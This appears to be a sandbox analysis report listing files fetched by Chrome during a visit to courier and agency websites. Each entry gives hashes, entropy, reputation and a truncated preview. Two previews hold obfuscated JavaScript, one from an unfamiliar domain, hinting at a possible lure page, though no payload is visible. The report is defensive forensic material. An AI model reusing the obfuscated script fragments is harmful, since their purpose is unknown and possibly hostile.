            Preview:const a20_0x238814=a20_0x9743;(function(_0x12b177,_0x56b5de){const _0x63ef76=a20_0x9743,_0x3a6df7=_0x12b177();while(!![]){try{const _0x3279a0=-parseInt(_0x63ef76(0x170))/0x1*(-parseInt(_0x63ef76(0x17a))/0x2)+-parseInt(_0x63ef76(0x18a))/0x3*(-parseInt(_0x63ef76(0x177))/0x4)+-parseInt(_0x63ef76(0x184))/0x5*(-parseInt(_0x63ef76(0x175))/0x6)+-parseInt(_0x63ef76(0x18e))/0x7+parseInt(_0x63ef76(0x179))/0x8+-parseInt(_0x63ef76(0x17e))/0x9*(parseInt(_0x63ef76(0x181))/0xa)+parseInt(_0x63ef76(0x16e))/0xb*(parseInt(_0x63ef76(0x183))/0xc);if(_0x3279a0===_0x56b5de)break;else _0x3a6df7['push'](_0x3a6df7['shift']());}catch(_0x38e49f){_0x3a6df7['push'](_0x3a6df7['shift']());}}}(a20_0x19b0,0x63a24));const a20_0x4e13db=(function(){let _0x1db1bf=!![];return function(_0x21ff4a,_0x2f7292){const _0x28ae9b=_0x1db1bf?function(){if(_0x2f7292){const _0x567814=_0x2f7292['apply'](_0x21ff4a,arguments);return _0x2f7292=null,_0x567814;}}:function(){};return _0x1db1bf=![],_0x28ae9b;};}()),a20_0x39a91d=a20_0x4e13db(thi
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (473)
            Category:downloaded
            Size (bytes):474
            Entropy (8bit):4.9993723900895395
            Encrypted:false
            SSDEEP:6:ZrXn6dB0HzMCRsCdgPbuxsMRIbVZptOzMmNoYmyCcmlxfECXW53A/Zs4Asxmlxfi:F6H0T4CkbuNmtg/1mxcCwA/85xcCwAiv
            MD5:A7943C6BEDFD0EE45E70E71ADB9E3C63
            SHA1:14201A96F0D76B7F18FCED3D317278E72FA9069C
            SHA-256:EE4B06866EA8E8EE4F2C5A1A0959CBD7B421E2D11536AC28BF468EE92F50AEEF
            SHA-512:55494E3ADB3E1D1AADB545712DED6E996F9B243FD9287214D5B0ACF7DD75A259D4A640D93F5C21953EE7F447723D46982AEEF69DB456CD9A1B913CD70BC8E596
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/ee4b0686tE5dP.css
            Preview:h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v-fe5ae731]{padding-left:14px}ul li[data-v-fe5ae731]{margin-top:8px}[data-v-1d5a903e] .content>p:first-of-type{color:#0033a0!important;font-size:20px!important}[data-v-1d5a903e] .content>p:first-of-type{font-weight:700}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):1585753
            Entropy (8bit):7.972672836196627
            Encrypted:false
            SSDEEP:49152:v6BbQ9U0EX51vwt7jQobpa82XoWo+STF70b:v6hQ9U5X5hwt/QobpkXoFob
            MD5:E16EED00DDBB3B43297368A5AFFBECB2
            SHA1:1E00C9C98FC9EDFAD312A616B114748DDE5E391F
            SHA-256:CB7D2868F5FF1432F8E4FDC1BA6C52A1E2083F1C258DF3E23CBA541B2566FFEC
            SHA-512:170E43AE2437C3C947A349351744D2754186B17D55AE30ACC2BB9FAF31CDB1F9181BFC21EBF62D5E66E89C6F616CCF522C6FD18323CCA633EA0E4088D9668406
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............S< 9....pHYs.................sRGB.........gAMA......a...1.IDATx...b$7.4..a.....FxV...0.%...*.[U.\.E.$....3.@..LD|}.^.u......u#..^i......._Sp...5......K.z..K$.}u..q.._o.......mr.\...d.y.G.Z.N...u.....r.a...2.u]......./CO..{z{.....{.}M..q.t.,7.c.A..l.... <..g..KL.&.>....7..m.?..|.d.......5...........o...{.......s..8.z..q....+...t....}Z:.E..w..l.Z0....vo....s...Uj..."....g.i....H.^`,.(......5.Bc..Q.-.t.FB......-ty..)..T].`.dq.3......<.........V.7....4.w._V\.Li^..K.......g.S..*....I,-W..Ly.fI...)5yy.....Fv0.,)"....xV..l..P..?..w..=.?)p..k.F..u.6..V.[..uE.r.2.Rog......T.'^..9..G....-......Y.4....7..h.........d.p.Z.2U9.p..W7....f0.Rv.ov..='..........>N{.B$*....n..kv...5.O..?...1..........C..-&5^...._.W..Ia3($+...{..Kp.Y._6.WG...=..0.........n.?....aOsx..@u.d;..}-....*a.v............:..Vs[M.^H.....7R...P.g6......Q.../^.?Y.........\n....o...Uq..?.b@.dN......3....P=...h....,.D. .....;.....N....&...b.._.7f.....R..DS...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):1352726
            Entropy (8bit):7.976143930604846
            Encrypted:false
            SSDEEP:24576:i+V5Wr6VDFzMmpLn5VTg+MSiQmQ5Mxz7wyb5BosS9ZL:bWOnbpL5PMSiQr5EzPksSz
            MD5:B02E3F80F885AEEE501B19CE6614950B
            SHA1:D5A9A52EF9B3A9A18AD6AB15C419E8A1BF8A2277
            SHA-256:FC3898E5E5A9538D20EF53F1A39A4EEA7602C8B2CF40C552141E168906A1D3CE
            SHA-512:31BF336DB618FF8327777C8913DFD82992D19CA9A776E7D6AA24CFAA909F9B0094DF51E7A928AA2F355C3F37044D0605DB30CFC86194D6DE4C11ED3F8AF110FB
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............S< 9....pHYs.................sRGB.........gAMA......a.....IDATx.....Jn-.h......_I...RY......D.#0.....|..W."......s..d..>T.W...3..~_k,......?....g.k@..Y............8d...>...}.5.>.[/..y.}~...-....l..[..0..^...s......".c...Ayq....|.9..g...........sa..8...zl..Dl..?...%.8.M..oq..V.8....*.......w...IN..H.1QG.A.o..........}......?u.-.......y.......o.t;t..I..|J.6\.n......)H...A....6..s&C..6.i.w'.......i".@..~...G*......5...vXk}.P^P|....!.l.m.9..5.nvl...=UM<L...x..g..KE..X....R.2.&........#.'.*y.....&.).;.....e...\W.'d...1X.....Ca..........\...r.+,.@....Z..8r.h...iv.....8.....j....)N........xD^{2.._...('..{nw.RO..s......W.^..wN.y..w...4..?k..c.M...V....@,?..HB>.M......../|5xx..H>%.....q...P.{<.....y.....n...s..L>._.E.......i63i...c...+N.rP.Zu^.....o.[.E.0.F7.w...p._.0.{./....>7.9j...Kv]5....3I.......y.@.....Oa^.^.V.{..P..{.(..........s.......e..........=..FV............O..?.)/....8.2g.......bf..a?.n....>8...Cz.BN..,'FH$...K.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (7310)
            Category:downloaded
            Size (bytes):292294
            Entropy (8bit):5.5556352862092515
            Encrypted:false
            SSDEEP:3072:N6ax8eulMYeip67/00VlXol0FQbQwM87uYL0sSN0LlspOsEemtJeNvZzVDOu8:0pmFu0lq0kd7DhJs8sEemveVzE
            MD5:F46719F88C15742BD319DA732F9E765B
            SHA1:F2509A5650C058AF5EEA2BB2F13B8A4E23B16D4E
            SHA-256:28C9EEB99BC4300D901C31A112C64604ED0EE4A70D297838DE80F31B08008684
            SHA-512:1BC67C6E837C3EA14A8C183B54A010510F2CDCEB8731CCB1FE9D3BA62FBC38818F2932851BB21C9CA6D15E7931298A3B57A7DB36D31F17B4BB9FFE0F6B96D198
            Malicious:false
            Reputation:low
            URL:https://www.googletagmanager.com/gtm.js?id=GTM-M62MD8G
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"36",. . "macros":[{"function":"__e"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-25318717-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__d","vtp_elementId":"boton","vtp_selectorType":"ID"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":fals
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:downloaded
            Size (bytes):51
            Entropy (8bit):4.297151508884876
            Encrypted:false
            SSDEEP:3:YWMmqejERpXERfJtZlCn:YWMm9gPERfJt6
            MD5:49E2BEC8E7BA486A81B1EBF711F78E3A
            SHA1:75505B06AE6DAB016FAF2EEF44826D21CB67975D
            SHA-256:F17BA6818FC73791411CAD8C126C7D7DB71B093191F8D7F775DAC5E3D1C62A69
            SHA-512:B8A28AA85465EE34717FB4908C0030A3FE3CA7BA323DBD2A6CBED8E04D6E7C53EB86F0D8BC6D45A1B18D5C12F064816E8ACC7C6A23A686B63C6F2B6CF66B978B
            Malicious:false
            Reputation:low
            URL:"https://c.go-mpulse.net/api/config.json?key=4PH5J-KTPZT-Y7BBJ-X8RU2-HCZ9X&d=www.servientrega.com&t=5757990&v=1.720.0&sl=0&si=1727b7ad-6199-4ba1-82de-ee753e930c1c-skg428&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,LOGN&acao=&ak.ai=746814"
            Preview:{"site_domain":"arlid:746814","rate_limited":true}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1026
            Entropy (8bit):4.670047719916863
            Encrypted:false
            SSDEEP:24:2dUsHc5xJTlB5J+Yi8HMtl7O2ElRbFVmlqo5dyknLz8DY/:cZ85PlB5J+sHml7yWp2G/P
            MD5:9A2FBD59907024A820CB74ACD498DB5B
            SHA1:D1A9778461A59C5BA3EB0CD7C62DE7D23F304E62
            SHA-256:AE4B5AB6606E097E82921CB8ACE161419601A4A58E7F95524D9858460CADD7EB
            SHA-512:6E668981FD7297F805F427C321D206F53699472E41F33DAABDC0F8FA9E33488AF7647F2D77F805B8F39109AED3691F572D8C2173F1C31FCE3E53F05C250FCE9B
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/header_fb.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="12px" height="21px" viewBox="0 0 12 21" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <desc>Created with Lunacy</desc>.. <path d="M11.1207 0.00420683L8.34894 0C5.23502 0 3.22266 1.95302 3.22266 4.97584L3.22266 7.27003L0.435825 7.27003C0.19501 7.27003 0 7.45471 0 7.68251L0 11.0065C0 11.2343 0.195232 11.4188 0.435825 11.4188L3.22266 11.4188L3.22266 19.8064C3.22266 20.0342 3.41767 20.2187 3.65848 20.2187L7.29451 20.2187C7.53533 20.2187 7.73034 20.034 7.73034 19.8064L7.73034 11.4188L10.9888 11.4188C11.2296 11.4188 11.4246 11.2343 11.4246 11.0065L11.426 7.68251C11.426 7.57314 11.3799 7.46839 11.2983 7.39098C11.2167 7.31357 11.1055 7.27003 10.9899 7.27003L7.73034 7.27003L7.73034 5.32522C7.73034 4.39046 7.96582 3.91593 9.25306 3.91593L11.1202 3.9153C11.3608 3.9153 11.5558 3.73062 11.5558 3.50303L11.5558 0.416476C11.5558 0.189097 11.361 0.00462751 11.1207 0.00420683Z" id="Shape" fill="#FFFFFF
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:downloaded
            Size (bytes):135
            Entropy (8bit):4.889758352890162
            Encrypted:false
            SSDEEP:3:YVKBEi5U34WIRL2KIhfwcP2xR2GXEqRWJ6jLZHJqbTjcB:YiXUIWIbU2mn6jLZpcO
            MD5:0DDE4E863FFF7591AD217E226FF903DC
            SHA1:3C56AD7A38C669482FFB6F279BCA70BB689436AF
            SHA-256:ADC5FC99F6C55671C1AD4C765156F4441A9FC6568728821C13DEACF29E17EEC2
            SHA-512:ADE53ABC2305B1AD978D42A9A17413569F70336A270F3643D24A0768664D930E860357F040283112271DA2E65B5D186340415983BC92002DE2E0583223BB1FA3
            Malicious:false
            Reputation:low
            URL:https://forms.hscollectedforms.net/collected-forms/v1/config/json?portalId=22144436&utk=
            Preview:{"portalId":22144436,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-616979290}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Algol 68 source, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1199
            Entropy (8bit):4.911975161717894
            Encrypted:false
            SSDEEP:24:VEy/CcqsC4jJbCn3F25pjaUpJD9KvFy/CRRVrc1+4h3SafdM3GYa:VbK/sC0W3UpmUpKvM/CBrc1+4h39dua
            MD5:F7B821C11D5CC4F69400F426D3344289
            SHA1:7A396CC453A17CB30492A3BBD5A92D8598CA160F
            SHA-256:9E78C24746666AD21A5735AB4166085CC35C6FCDB1FB8D6130358099E091804E
            SHA-512:904138C32002AD55A54B66ABE93C9817C5544BA935F389BC198CD478971BD63B7D0ADDF6CC835BCB5810FF37DE961AD20FD00E5887C4830A2DEFACB530FBEA8E
            Malicious:false
            Reputation:low
            Preview:/*-------------Label for phone-------------*/..const input = document.querySelector("#phone");..window.intlTelInput(input, {.. initialCountry: "co",.. onlyCountries: ['us', 'gb', 'ca', 'co', 'mx', 'br', 'es', 'de', 'fr', 'it', 'nl', 'ch', 'pe', 'ec', 'ar', 'py', 'uy', 've'],.. preferredCountries: ['co', 'us'],.. utilsScript: "https://cdn.jsdelivr.net/npm/intl-tel-input@20.0.5/build/js/utils.js",.. customPlaceholder: function (.. selectedCountryPlaceholder,.. selectedCountryData.. ) {.. return "e.g. " + selectedCountryPlaceholder;.. },..});....var iti = window.intlTelInputGlobals.getInstance(input);....input.addEventListener('input', function () {.. var countryName = iti.getSelectedCountryData().name;.. document.getElementById('country').value = countryName;..});....$(document).ready(function () {.. $('#phone').on('input', function () {.. if ($(this).val().trim() !== '') {.. $('.label-phone').addClass('active');..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ISO-8859 text, with CRLF line terminators
            Category:downloaded
            Size (bytes):3224
            Entropy (8bit):4.800006129445097
            Encrypted:false
            SSDEEP:48:N2rRnznzYvzWPzE2MJGv2fONFYRVW+R779i79C7AyBN2/3nV30V3YL/3J:2nbw24qv2fO8F2vnR0RYvJ
            MD5:A5B73F41A64B25D9158D8AEF8FB3DBDE
            SHA1:898D7227D4CF4A9310103963B9CBD864CB800AD1
            SHA-256:DD9B1B3637D8632A4B77CE9E9E4B05A9F349236A09A387C9AD76E65D88912944
            SHA-512:546DA1FA17383D1E3DFA260EE6A18E1505D978A0AC0A756DFACD064763AA4610F242BC819FEF651D8421833FCC11D5D28688E8AD4C92DBE857803FC5B7AA570F
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/js/rastreo.js
            Preview:$(document).ready(function () {...... $("input[name=filtro][value=g]").attr('checked', 'checked');...var storageVal = localStorage.content;.... if (storageVal != undefined) {.. $("#lblEstado").val(storageVal);.. if (storageVal == 'remiso') {.. $("input[name=filtro][value=r]").attr('checked', 'checked');.. localStorage.removeItem('content');.. } else if (storageVal == 'factura') {.. $("input[name=filtro][value=f]").attr('checked', 'checked');.. localStorage.removeItem('content');.. } else {.. $("input[name=filtro][value=g]").attr('checked', 'checked');.. localStorage.removeItem('content');.. }.. } else {.. $("input[name=filtro][value=g]").attr('checked', 'checked');.. localStorage.removeItem('content');.. }.... $("#boton").click(function () {....localStorage.content = $("#lblEstado").val();.. var valNumguia = $("#txtNumGuia").val();....var estado = $("#lb
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):17096
            Entropy (8bit):4.06268773612239
            Encrypted:false
            SSDEEP:384:yRIaq2IcnRr9ATrKeIYJwHe5NVMtkmvzYeC5OWLIV4lC6:yRIa2cnRr9ATW5u75N1mvzb4l9
            MD5:4E76A20309EC1E227FB24B73C1D80F62
            SHA1:4349111C3A9769B172B35FB7A5C67DF45E12680F
            SHA-256:6E538FD4830A9E6A7249EE815FDA61CC682CE78926D0B04EB1A553D708F23AAB
            SHA-512:FB51B21BE9A45EF1B8E5504B7DCB1416FC00759210AA2F1F33E422BAC14074864A56FB2C2B7C701C3C922CB06D1281D3B7348FCF9C1FAFBFE9F7C319DAEEF4B2
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 16</title>. <defs>. <polygon id="path-1" points="0 0 27 0 27 21 0 21"></polygon>. </defs>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-608.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-16" transform="translate(522.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3">. <mask id="mask-2" fill="white">. <use xlink:href="#path-1"></use
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2232
            Entropy (8bit):4.963491601667423
            Encrypted:false
            SSDEEP:24:2dZnmPL0/veaxMnYdoVjt4Mt4Psdn3b8iY7NogA4g2PFygx0FlwfPx42PFydM/t9:cZmjFYl2dUJN/x0FufPF6Mlkz4ZB3
            MD5:264987FA326BA5ECD1CB4E6449D099EF
            SHA1:086968AA4BF1A6ABE53A68944480DA74AEAE4E85
            SHA-256:F44306656CF70EBC5B7A66D84673C471E5786ACAA304A47FFFEAC3AACA7834BA
            SHA-512:888EE1D7864C8719B3E95E7A026BE1848264EC7197277077C692B36F5BAF6EE0500B3004AE8F38D17F58B590920B7277F8F252929333190AFCF1A7A4248A58F3
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 75</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-1029.000000, -984.000000)" id="Group-75">.. <g transform="translate(1029.000000, 984.000000)">.. <g id="Group-52" fill="#670DFF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <path d="M20.5853271,21.4768205 C19.9958731,20.8410598 19.0399853,20.8410598 18.4504307,21.4768205 L12.442166,27.9559799 C11.8526113,28.5917406 11.8526113,29.622437 12.442166,30.2581977 L18.4504307,36.737357 C19.0398847,37.3731178 19.9957724,37.3732263 20.5853271,36.737357 C21.1748818,36.1015963 21.1748818,35.0708999 20.5853271,34.4351392 L15.644561,29.107143 L20.5854277,23.77903
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):140149
            Entropy (8bit):7.968682906491827
            Encrypted:false
            SSDEEP:3072:oSq0AbG7eQEjAeb0hivmLgpe/Y8bO/JlUkJDNi5I:xSv4h866e5biJlp0G
            MD5:5C3F3D90AA9A02A2DE51ED41FCA7AA1C
            SHA1:DC78B1317E57BD8849B61244B1C124BC9B8E3F42
            SHA-256:8352FBC4D250E2F1107C2BF3E35CFFDF360299B234435B932A92B347653A1A43
            SHA-512:7C3D2CB146573BC6CDB892C2F730E80C048DE6DFB9911FCD1D5F2D4294F5ACC1C9E2ADF035E16036C419713AD1067EDAD208CC4BF199D6B23763F58FC1C6C99E
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............{Oa....PLTE.....B..9.....0..(.................C..;..=..3..A..6#$(..8..?........".....0............!#$.. ..)..,..$.....'.... !.... $..!..$.....&(*-........<&(*..-..*.!/,.0..9..!..).."..'.'=..7.%8.#4..+.03.....#.)B..............0&....!.....&..*..(..2.....6..3.....4.....6........................LAWC9L135..)......../...........'%)%.. JLP.-J2);...`ae..%ORW..."#.SUY}}.578MOS..G%.....*.....8/A)-.EFI9;=}z.........0&,*ktHmnpWc-+1&sqx..(1..>?A..HGILryZACEgflUW`xyz......27,...,7.[\]...........7..>v.8v....aw...D.....9...Xn......{..0V...>.........AJ$IN6q.,;A/es,...6y.\..LV%At......5<...1........5.k...O..e...1%.(6O#3.?M.........GS....=)V.D/.7F[{.Df..E]gw.......R..v*..]..|..... @..6c........m..i...D....^........k:...J...-^........oq..RN.....c?..Q...q.aG.s...e..w$....+...7.........tRNS.......F..... .IDATx..M..@.F.b..M...*...iK.!>...)`..._....E......./.!_0(...._n.w.uH>../.|...........T......Op.~l..........p._3....vx.:..0C..=..92.....6.&.l\.a...L"d.K5....o
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):503862
            Entropy (8bit):5.245981135808853
            Encrypted:false
            SSDEEP:12288:lV+SQs7Wef1mLdQTqlwTalq+lrjzGc12diaqW9e3SqsHEEvwrKq09FZxM9L+Tomh:TV1mLdQKr2dzSl4xskh
            MD5:D4919984F18EA29434D1C2E4648F2A66
            SHA1:3490D92405665D1E2F2011E7DE7A2DA5355774F6
            SHA-256:71A8E1816B74206F7B646A864DF562AB9E15125939D076273203FE9446D38AE8
            SHA-512:AC6A6BF0250E01A9476935BE25E4FFB9649E06C9A4DFF12CE7C299B53E47BF2103C118B7CDC669C52DE8FDEEAD29A594200050043FE5A2A8F559338ADCDE884A
            Malicious:false
            Reputation:low
            Preview:var a38_0x39acfc=a38_0x2163;(function(_0x3f6a27,_0x3f3530){var _0xdf64b4=a38_0x2163,_0x480821=_0x3f6a27();while(!![]){try{var _0x4971d8=-parseInt(_0xdf64b4(0x1b0))/0x1+parseInt(_0xdf64b4(0x6c2))/0x2+parseInt(_0xdf64b4(0x4ca))/0x3*(-parseInt(_0xdf64b4(0x298))/0x4)+parseInt(_0xdf64b4(0x1d7))/0x5+parseInt(_0xdf64b4(0x1cf))/0x6+parseInt(_0xdf64b4(0x761))/0x7*(parseInt(_0xdf64b4(0x768))/0x8)+parseInt(_0xdf64b4(0x63e))/0x9;if(_0x4971d8===_0x3f3530)break;else _0x480821['push'](_0x480821['shift']());}catch(_0x1a533a){_0x480821['push'](_0x480821['shift']());}}}(a38_0x3be6,0x225bb));function Px(){var _0xeaf1bd=a38_0x2163;import.meta[_0xeaf1bd(0x2fa)],import('_')[_0xeaf1bd(0x387)](()=>0x1);async function*_0x3d95b8(){}}(function(){var _0x32db3c=a38_0x2163,_0xcd12cb=(function(){var _0x1b4925=!![];return function(_0x154766,_0x5c4c92){var _0x535691=_0x1b4925?function(){var _0x5daaa6=a38_0x2163;if(_0x5c4c92){var _0x1573a8=_0x5c4c92[_0x5daaa6(0x593)](_0x154766,arguments);return _0x5c4c92=null,_0x1573a8
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):23498
            Entropy (8bit):4.927450576359466
            Encrypted:false
            SSDEEP:192:NaPRhdzBqMk4rOOhnvuvGZxJnQ+wC1U/tCPQHW+N0s0x0D010M0L91Zp2FXevplF:5GJhJNQ+w1ouW8/YmWdHuGjLC
            MD5:2216D12846232C7257694EB3FB8E32E4
            SHA1:09C3867F395F703180D6F6815FC94634521D4E4A
            SHA-256:158F8E3ED664A141315E92D6382192661415F554DF8B5AAB78A087402CB333A3
            SHA-512:08D1C39F49EF5ABF94C4F49976E2767ACD1631D1CB19D36BB0D983EDB46A81C169588EDA714880B4A5F4E5AD6F4749EDD0D89CB6CCC09AAAE3CE84B7C7008855
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/css/styles.css
            Preview:@charset "utf-8";../* CSS Document */..../*------------------*/..../* Indice....1. Base ..2. Layout ..3. Modules ..4. State ..5. Theme ....*/.....b-example-divider {.. height: 3rem;.. background-color: rgba(0, 0, 0, .1);.. border: solid rgba(0, 0, 0, .15);.. border-width: 1px 0;.. box-shadow: inset 0 .5em 1.5em rgba(0, 0, 0, .1), inset 0 .125em .5em rgba(0, 0, 0, .15);..}.....form-control-dark {.. color: #fff;.. background-color: var(--bs-dark);.. border-color: var(--bs-gray);..}...form-control-dark:focus {.. color: #fff;.. background-color: var(--bs-dark);.. border-color: #fff;.. box-shadow: 0 0 0 .25rem rgba(255, 255, 255, .25);..}.....bi {.. vertical-align: -.125em;.. fill: currentColor;..}....../* ---------------------- Base ---------------------- */....:root {...--primary-green: #009A44;...--secondary-green: #56C271;...--light-green: #B0F78B;...--medium-green: #8EDD65;...--pink-trademark: #DF1995;...--primary-gray: #525252;...--light-gray: #5E5E5E;...--text-gray: #48
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):13
            Entropy (8bit):2.7773627950641693
            Encrypted:false
            SSDEEP:3:qVZPV:qzd
            MD5:C83301425B2AD1D496473A5FF3D9ECCA
            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
            Malicious:false
            Reputation:low
            URL:https://td.doubleclick.net/td/rul/10981864615?random=1727397050638&cv=11&fst=1727397050638&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&ct_cookie_present=0
            Preview:<html></html>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2485)
            Category:downloaded
            Size (bytes):25226
            Entropy (8bit):5.299886609169562
            Encrypted:false
            SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+Y9RW8gtgePWe7dtbacTj:RIT7sZwuvL54WAclt
            MD5:5717F9683FC74E4BD1D041D04026A6A4
            SHA1:ECEEF812A403BD16CECD332E822F60DC6F9D6536
            SHA-256:BF6CA87D4B9262CE13240D90B7077F84EF5BE0855836D0D30B2B84CA777DD519
            SHA-512:C194BBA8A991CB5F8419A98F98D3C26C76CF30F3CD9C0557D5471ACF63BAD7FF46B4A321071EEE24C59F8A59BE05B78D376A3A2FF7D3EF6EA2AFF5FFBE1CC65B
            Malicious:false
            Reputation:low
